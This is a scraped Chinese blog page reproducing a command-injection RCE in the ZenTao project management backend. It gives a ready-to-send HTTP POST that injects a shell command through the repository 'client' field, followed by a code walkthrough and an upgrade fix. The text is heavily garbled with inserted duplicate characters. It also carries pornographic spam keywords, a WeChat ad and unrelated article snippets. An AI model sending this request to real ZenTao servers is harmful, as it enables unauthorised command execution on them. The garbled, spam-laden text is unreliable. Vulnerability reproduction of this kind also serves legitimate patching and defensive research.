国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

禪道后臺(tái)命令執(zhí)行漏洞

這篇具有很好參考價(jià)值的文章主要介紹了禪道后臺(tái)命令執(zhí)行漏洞。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

漏洞簡介

禪道是第一款國產(chǎn)的開源項(xiàng)目管理軟件。它集產(chǎn)品管理、項(xiàng)目管理、質(zhì)量管理、文檔管理、 組織管理和事務(wù)管理于一體,是一款專業(yè)的研發(fā)項(xiàng)目管理軟件,完整地覆蓋了項(xiàng)目管理的核心流程。?禪道管理思想注重實(shí)效,功能完備豐富,操作簡潔高效,界面美觀大方,搜索功能強(qiáng)大,統(tǒng)計(jì)報(bào)表豐富多樣,軟件架構(gòu)合理,擴(kuò)展靈活,有完善的 API 可以調(diào)用。

禪道后臺(tái)存在 RCE 漏洞,均存在于歷史版本,對這些漏洞進(jìn)行復(fù)現(xiàn)分析。

環(huán)境搭建

源碼下載地址?https://dl.cnezsoft.com/zentao/18.0.beta1/ZenTaoPMS.18.0.beta1.php7.2_7.4.zip

利用 phpstudy 來進(jìn)行環(huán)境的搭建

?

?

漏洞復(fù)現(xiàn)

登錄后臺(tái)創(chuàng)建 GitLab 類型的代碼庫

點(diǎn)擊 DevOps 模塊的設(shè)置選項(xiàng),修改創(chuàng)建的代碼庫

點(diǎn)擊保存并抓取數(shù)據(jù)包

修改參數(shù) SCM 和 client SCM 修改為?Subversion? client 修改為?calc | echo "?

觸發(fā)了命令執(zhí)行,執(zhí)行了兩次

??

【----幫助網(wǎng)安學(xué)習(xí),以下所有學(xué)習(xí)資料免費(fèi)領(lǐng)!加vx:yj009991,備注 “博客園” 獲?。 ?/p>

?、?網(wǎng)安學(xué)習(xí)成長路徑思維導(dǎo)圖
?、?60+網(wǎng)安經(jīng)典常用工具包
?、?100+SRC漏洞分析報(bào)告
?、?150+網(wǎng)安攻防實(shí)戰(zhàn)技術(shù)電子書
 ⑤ 最權(quán)威CISSP 認(rèn)證考試指南+題庫
?、?超1800頁CTF實(shí)戰(zhàn)技巧手冊
?、?最新網(wǎng)安大廠面試題合集(含答案)
?、?APP客戶端安全檢測指南(安卓+IOS)

漏洞分析

發(fā)現(xiàn)有一些分析文章中描述需要先創(chuàng)建一個(gè)代碼倉庫,也指出了創(chuàng)建代碼倉庫的原因,因?yàn)檎{(diào)用的是 edit 方法,所以要先 create

經(jīng)過調(diào)試發(fā)現(xiàn)這是必須的,因?yàn)樵跊]創(chuàng)建代碼庫時(shí),執(zhí)行 edit 方法,會(huì)提示跳轉(zhuǎn)去創(chuàng)建代碼庫

module/repo/control.php#commonAction?

所以需要先創(chuàng)建代碼庫

module/repo/control.php#create?

module/repo/model.php#create?

在創(chuàng)建代碼庫的時(shí)候有一個(gè)檢查 Client 的操作 只有選擇 Gitlab 才能不做客戶端的檢測操作,直接創(chuàng)建成功

module/repo/model.php#checkClient?

創(chuàng)建成功后執(zhí)行編輯操作觸發(fā)漏洞

POST /index.php?m=repo&f=edit&repoID=0 HTTP/1.1
Host: test.test
Content-Length: 36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/index.php?m=repo&f=edit&repoID=1&objectID=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; windowWidth=1440; windowHeight=722; tab=devops; repoBranch=master;XDEBUG_SESSION=PHPSTORM
Connection: close
?
SCM=Subversion&client= calc | echo "

module/repo/control.php#edit?

module/repo/model.php#update?

module/repo/model.php#checkConnection?

?

???

修復(fù)建議

更新至最新版本

更多網(wǎng)安技能的在線實(shí)操練習(xí),請點(diǎn)擊這里>>

???文章來源地址http://www.zghlxwxcb.cn/news/detail-668704.html

到了這里,關(guān)于禪道后臺(tái)命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • XXL-JOB 任務(wù)調(diào)度中心 后臺(tái)任意命令執(zhí)行漏洞

    XXL-JOB 任務(wù)調(diào)度中心 后臺(tái)任意命令執(zhí)行漏洞

    在日常開發(fā)中,經(jīng)常會(huì)用定時(shí)任務(wù)執(zhí)行某些不緊急又非常重要的事情,例如批量結(jié)算,計(jì)算當(dāng)日的訂單量,當(dāng)日的成本收入等。當(dāng)存在大量定時(shí)任務(wù)的時(shí)候,任務(wù)的管理也會(huì)成為一個(gè)比較頭痛的問題。xxl-job,就是一個(gè)比較成熟的分布式任務(wù)調(diào)度平臺(tái)。XXL-JOB 任務(wù)調(diào)度中心系統(tǒng)

    2024年02月08日
    瀏覽(20)
  • linux后臺(tái)執(zhí)行命令:&與nohup的用法

    背景:電腦使用ssh工具遠(yuǎn)程連接服務(wù)器跑深度學(xué)習(xí)的時(shí)候,本地的終端叉掉的時(shí)候,會(huì)把服務(wù)器上的代碼進(jìn)程一起叉掉了,這在實(shí)際場景中,非常的不方便,因?yàn)椴豢杀苊鈺?huì)遭受不可抗拒的原因需要代碼只在服務(wù)器上跑,比如,網(wǎng)絡(luò)原因ssh連接不穩(wěn)定,本地電腦斷電等。 直接

    2024年02月10日
    瀏覽(21)
  • 入門漏洞——命令執(zhí)行漏洞、目錄瀏覽漏洞

    入門漏洞——命令執(zhí)行漏洞、目錄瀏覽漏洞

    一、命令執(zhí)行漏洞 1.介紹 命令執(zhí)行(Command Execution)漏洞即可以直接在Web應(yīng)用中執(zhí)行系統(tǒng)命令,從而獲取敏感信息或者拿下shell權(quán)限,服務(wù)器沒有對執(zhí)行的命令進(jìn)行過濾。用戶可以隨意執(zhí)行系統(tǒng)命令,屬于高危漏洞 命令執(zhí)行漏洞可能造成的原因是Web服務(wù)器對用戶輸入命令安全

    2024年02月04日
    瀏覽(18)
  • 漏洞靶場——DVWA+命令執(zhí)行漏洞

    漏洞靶場——DVWA+命令執(zhí)行漏洞

    DVWA是OWASP官方編寫的PHP網(wǎng)站,包含了各種網(wǎng)站常見漏洞 DVWA搭建環(huán)境: PHP環(huán)境+DVWA源代碼 https://github.com/digininja/DVWA/archive/master.zip 安裝phpstudy 命令執(zhí)行漏洞是指服務(wù)器沒有對執(zhí)行的命令進(jìn)行過濾,用戶可以隨意執(zhí)行系統(tǒng)命令,命令執(zhí)行漏洞屬于高危漏洞之一。 命令連接符 :

    2024年02月06日
    瀏覽(21)
  • 漏洞復(fù)現(xiàn)|Kyan密碼泄露/命令執(zhí)行漏洞

    漏洞復(fù)現(xiàn)|Kyan密碼泄露/命令執(zhí)行漏洞

    所有發(fā)布的技術(shù)文章僅供參考,未經(jīng)授權(quán)請勿利用文章中的技術(shù)內(nèi)容對任何計(jì)算機(jī)系統(tǒng)進(jìn)行入侵操作,否則對他人或單位而造成的直接或間接后果和損失,均由使用者本人負(fù)責(zé)。 Kyan網(wǎng)絡(luò)監(jiān)控設(shè)備存在賬號密碼泄露漏洞,該漏洞是由于開發(fā)人員將記錄賬戶密碼的文件放到網(wǎng)站

    2024年02月12日
    瀏覽(19)
  • RCE代碼執(zhí)行漏和命令執(zhí)行漏洞

    RCE代碼執(zhí)行漏和命令執(zhí)行漏洞

    前置知識: 漏洞檢測: 在了解漏洞概念前,應(yīng)該先知道一下這個(gè)漏洞如何檢測的,我們應(yīng)該或多或少聽過白盒測試(白盒),黑盒測試(黑盒)。 白盒測試: 白盒測試是對源代碼和內(nèi)部結(jié)構(gòu)的測試,測試人員是可以知道內(nèi)部的邏輯和結(jié)構(gòu)的,差不多就是代碼審計(jì)。 黑盒測試:

    2024年02月19日
    瀏覽(31)
  • 命令執(zhí)行漏洞 | iwebsec

    命令執(zhí)行漏洞 | iwebsec

    這是 iwebsec 靶場,具體搭建過程可以看前面的文章。 應(yīng)用程序有時(shí)需要調(diào)用一些執(zhí)行系統(tǒng)命令的函數(shù),如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函數(shù)執(zhí)行系統(tǒng)命令。當(dāng)黑客能控制這些函數(shù)中的參數(shù)時(shí),就可以將惡意的系統(tǒng)命令拼接到正常的命令中,從而

    2024年01月24日
    瀏覽(23)
  • 【網(wǎng)絡(luò)安全】命令執(zhí)行漏洞

    【網(wǎng)絡(luò)安全】命令執(zhí)行漏洞

    應(yīng)用程序中有時(shí)候需要調(diào)用一些執(zhí)行系統(tǒng)命令的函數(shù),在php中常見的為 system 、 exec 、 shell_exec 、 passthru 、 proc_poen 、 popen 等函數(shù)用來執(zhí)行系統(tǒng)命令。當(dāng)黑客能控制這些函數(shù)的參數(shù)時(shí),就可以講惡意的系統(tǒng)命令拼接到正常的命令中,就會(huì)命令執(zhí)行攻擊,這就是命令執(zhí)行漏洞。

    2024年02月03日
    瀏覽(31)
  • 命令執(zhí)行漏洞

    命令執(zhí)行漏洞

    堅(jiān)持就是有點(diǎn)麻煩,但是你只要做下去就會(huì)感到習(xí)慣和快樂的事。 什么是命令執(zhí)行漏洞?命令執(zhí)行漏洞就是服務(wù)器端沒有對客戶端用戶輸入的命令進(jìn)行過濾,導(dǎo)致用戶可以通過任意拼接系統(tǒng)命令,使服務(wù)器端成功執(zhí)行任意系統(tǒng)命令。為什么客戶端能直接對服務(wù)器執(zhí)行命令呢,

    2024年02月07日
    瀏覽(12)
  • Yapi命令執(zhí)行漏洞復(fù)現(xiàn)

    Yapi命令執(zhí)行漏洞復(fù)現(xiàn)

    YApi 是高效、易用、功能強(qiáng)大的 api 管理平臺(tái),旨在為開發(fā)、產(chǎn)品、測試人員提供更優(yōu)雅的接口管理服務(wù)。可以幫助開發(fā)者輕松創(chuàng)建、發(fā)布、維護(hù) API,YApi 還為用戶提供了優(yōu)秀的交互體驗(yàn),開發(fā)人員只需利用平臺(tái)提供的接口數(shù)據(jù)寫入工具以及簡單的點(diǎn)擊操作就可以實(shí)現(xiàn)接口的管

    2024年02月12日
    瀏覽(18)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包